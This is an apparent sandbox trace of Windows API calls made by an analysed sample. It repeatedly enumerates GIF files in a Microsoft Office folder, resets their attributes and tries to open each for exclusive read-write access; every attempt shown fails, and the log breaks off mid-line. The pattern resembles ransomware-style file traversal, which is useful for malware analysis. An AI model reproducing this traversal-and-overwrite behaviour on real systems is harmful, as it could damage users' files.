0 [0136.369] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.369] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.369] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.370] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR32B.GIF", dwFileAttributes=0x80) returned 0 [0136.370] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR32B.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir32b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.370] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.370] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.370] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.370] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.370] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR32F.GIF", dwFileAttributes=0x80) returned 0 [0136.371] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR32F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir32f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.371] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.371] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.371] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.372] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.372] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR33B.GIF", dwFileAttributes=0x80) returned 0 [0136.372] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR33B.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir33b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.373] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.373] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.373] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.373] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.373] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR33F.GIF", dwFileAttributes=0x80) returned 0 [0136.373] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR33F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir33f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.373] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.373] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.373] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.373] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.374] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR34B.GIF", dwFileAttributes=0x80) returned 0 [0136.374] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR34B.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir34b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.374] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.374] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.374] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.374] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.374] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR34F.GIF", dwFileAttributes=0x80) returned 0 [0136.375] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR34F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir34f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.375] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.375] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.375] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.375] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.375] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR35B.GIF", dwFileAttributes=0x80) returned 0 [0136.375] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR35B.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir35b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.375] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.375] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.376] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.376] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.376] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR35F.GIF", dwFileAttributes=0x80) returned 0 [0136.376] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR35F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir35f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.376] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.376] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.376] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.376] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.376] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR36B.GIF", dwFileAttributes=0x80) returned 0 [0136.376] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR36B.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir36b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.377] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.377] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.377] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.377] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.377] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR36F.GIF", dwFileAttributes=0x80) returned 0 [0136.377] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR36F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir36f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.378] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.378] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.378] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.378] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.378] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR37F.GIF", dwFileAttributes=0x80) returned 0 [0136.378] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR37F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir37f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.378] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.378] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.378] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.378] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.379] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR38F.GIF", dwFileAttributes=0x80) returned 0 [0136.379] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR38F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir38f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.379] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.379] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.379] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.379] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.379] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR39F.GIF", dwFileAttributes=0x80) returned 0 [0136.379] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR39F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir39f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.379] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.379] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.379] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.379] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.380] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR3B.GIF", dwFileAttributes=0x80) returned 0 [0136.380] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR3B.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir3b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.380] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.380] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.381] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.381] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.381] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR3F.GIF", dwFileAttributes=0x80) returned 0 [0136.381] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR3F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir3f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.381] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.381] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.381] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.381] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.381] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR40F.GIF", dwFileAttributes=0x80) returned 0 [0136.381] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR40F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir40f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.382] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.382] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.382] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.382] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.382] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR41F.GIF", dwFileAttributes=0x80) returned 0 [0136.382] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR41F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir41f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.382] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.382] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.382] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.382] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.382] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR42F.GIF", dwFileAttributes=0x80) returned 0 [0136.383] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR42F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir42f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.383] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.383] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.383] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.383] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.384] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR43B.GIF", dwFileAttributes=0x80) returned 0 [0136.384] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR43B.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir43b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.384] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.384] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.384] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.384] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.384] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR43F.GIF", dwFileAttributes=0x80) returned 0 [0136.384] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR43F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir43f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.384] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.384] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.385] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.385] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.385] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR44B.GIF", dwFileAttributes=0x80) returned 0 [0136.385] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR44B.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir44b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.385] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.385] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.385] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.385] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.385] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR44F.GIF", dwFileAttributes=0x80) returned 0 [0136.386] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR44F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir44f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.386] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.386] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.386] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.386] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.386] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR45B.GIF", dwFileAttributes=0x80) returned 0 [0136.386] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR45B.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir45b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.387] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.387] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.387] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.387] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.387] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR45F.GIF", dwFileAttributes=0x80) returned 0 [0136.387] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR45F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir45f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.387] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.387] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.387] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.387] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.387] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR46B.GIF", dwFileAttributes=0x80) returned 0 [0136.388] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR46B.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir46b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.388] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.388] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.388] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.388] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.388] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR46F.GIF", dwFileAttributes=0x80) returned 0 [0136.389] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR46F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir46f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.389] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.389] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.389] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.389] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.389] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR47B.GIF", dwFileAttributes=0x80) returned 0 [0136.389] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR47B.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir47b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.389] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.389] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.390] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.390] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.390] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR47F.GIF", dwFileAttributes=0x80) returned 0 [0136.390] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR47F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir47f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.390] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.390] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.390] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.390] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.390] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR48B.GIF", dwFileAttributes=0x80) returned 0 [0136.390] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR48B.GIF" (normalized: "c:\\program files\\microsoft 